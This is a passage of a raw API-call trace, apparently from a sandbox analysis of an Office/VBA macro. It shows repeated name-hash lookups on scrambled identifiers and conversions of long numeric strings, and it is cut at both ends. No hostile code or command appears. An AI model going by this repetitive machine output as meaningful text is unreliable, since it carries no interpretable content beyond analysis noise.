returned 0x0 [0067.789] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.789] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OcwwDxUQ") returned 0x1091fa [0067.789] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="718544484") returned 10 [0067.789] VarI4FromStr (in: strIn="718544484", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="409411168") returned 10 [0067.789] VarI4FromStr (in: strIn="409411168", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.789] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="555708371") returned 10 [0067.790] VarI4FromStr (in: strIn="555708371", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="978472189") returned 10 [0067.790] VarI4FromStr (in: strIn="978472189", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.790] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="125232786") returned 10 [0067.790] VarI4FromStr (in: strIn="125232786", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.790] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a18760, cb=0x480) returned 0x6754f90 [0067.790] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zADAAABB") returned 0x10aafe [0067.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="535168921") returned 10 [0067.790] VarI4FromStr (in: strIn="535168921", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.790] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mBcAUkQ") returned 0x1027a2 [0067.790] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.790] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.790] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.790] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RQGAkAAU") returned 0x109e84 [0067.790] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZA1AxXA") returned 0x1005ec [0067.790] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.791] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mwGBoAA") returned 0x10c9d6 [0067.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="553401725") returned 10 [0067.791] VarI4FromStr (in: strIn="553401725", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.791] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FBDZwA") returned 0x103361 [0067.791] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DQBBxo") returned 0x108784 [0067.791] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GAkA4wAD") returned 0x10c2aa [0067.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="559772210") returned 10 [0067.791] VarI4FromStr (in: strIn="559772210", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="461089845") returned 10 [0067.791] VarI4FromStr (in: strIn="461089845", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="661221981") returned 10 [0067.791] VarI4FromStr (in: strIn="661221981", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="689421010") returned 10 [0067.791] VarI4FromStr (in: strIn="689421010", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="796261855") returned 10 [0067.791] VarI4FromStr (in: strIn="796261855", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.791] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="foQkCU") returned 0x105332 [0067.791] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.792] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dAxAAB") returned 0x105d01 [0067.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="899664189") returned 10 [0067.792] VarI4FromStr (in: strIn="899664189", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="200044816") returned 10 [0067.792] VarI4FromStr (in: strIn="200044816", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.792] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.792] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="w1DAkQoA") returned 0x10db6e [0067.792] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="739571070") returned 10 [0067.792] VarI4FromStr (in: strIn="739571070", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="940689061") returned 10 [0067.792] VarI4FromStr (in: strIn="940689061", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.792] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="769381057") returned 10 [0067.792] VarI4FromStr (in: strIn="769381057", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="587394761") returned 10 [0067.792] VarI4FromStr (in: strIn="587394761", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.792] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="417213991") returned 10 [0067.793] VarI4FromStr (in: strIn="417213991", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.793] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rwc_Qc") returned 0x10fe61 [0067.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="555473500") returned 10 [0067.793] VarI4FromStr (in: strIn="555473500", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.793] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dAB_AQGA") returned 0x100d05 [0067.793] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.793] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.793] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.793] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iAA11AkB") returned 0x10028e [0067.793] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pUkAAAA1") returned 0x102e81 [0067.793] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.793] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vAQXB1_") returned 0x108b9c [0067.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=9 | out: lpWideCharStr="54284777") returned 9 [0067.793] VarI4FromStr (in: strIn="54284777", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.793] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="U1B4wk1c") returned 0x109e87 [0067.794] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="axkXAA") returned 0x10a612 [0067.794] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pAAAAB") returned 0x10aadd [0067.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="767930234") returned 10 [0067.794] VarI4FromStr (in: strIn="767930234", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="864119435") returned 10 [0067.794] VarI4FromStr (in: strIn="864119435", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="840431413") returned 10 [0067.794] VarI4FromStr (in: strIn="840431413", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="233226221") returned 10 [0067.794] VarI4FromStr (in: strIn="233226221", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="431754384") returned 10 [0067.794] VarI4FromStr (in: strIn="431754384", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.794] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DAAAZoQ") returned 0x10d28b [0067.794] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.794] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WGADDAGB") returned 0x10ea5b [0067.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=9 | out: lpWideCharStr="48669113") returned 9 [0067.794] VarI4FromStr (in: strIn="48669113", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="704056661") returned 10 [0067.794] VarI4FromStr (in: strIn="704056661", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.795] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.795] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NA_ABA") returned 0x10a7d2 [0067.795] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="837439844") returned 10 [0067.795] VarI4FromStr (in: strIn="837439844", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="345312132") returned 10 [0067.795] VarI4FromStr (in: strIn="345312132", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.795] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="273457832") returned 10 [0067.795] VarI4FromStr (in: strIn="273457832", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=9 | out: lpWideCharStr="63506446") returned 9 [0067.795] VarI4FromStr (in: strIn="63506446", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.795] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="534676408") returned 10 [0067.795] VarI4FromStr (in: strIn="534676408", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.795] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WBZQA1A_") returned 0x10ac16 [0067.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="980893528") returned 10 [0067.795] VarI4FromStr (in: strIn="980893528", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.796] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QDZoXAX") returned 0x103e89 [0067.796] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.796] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.796] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.796] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZQAAAB") returned 0x10ac53 [0067.796] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aAAA4x") returned 0x1054a7 [0067.796] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.796] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="B_GAZAZ") returned 0x106515 [0067.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="189146771") returned 10 [0067.796] VarI4FromStr (in: strIn="189146771", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.796] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Nko4Aw") returned 0x10baa8 [0067.796] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JAAX_AkU") returned 0x10c2f3 [0067.796] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dAUAAZU") returned 0x10b4c4 [0067.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="238704000") returned 10 [0067.796] VarI4FromStr (in: strIn="238704000", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="422465549") returned 10 [0067.796] VarI4FromStr (in: strIn="422465549", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="258105481") returned 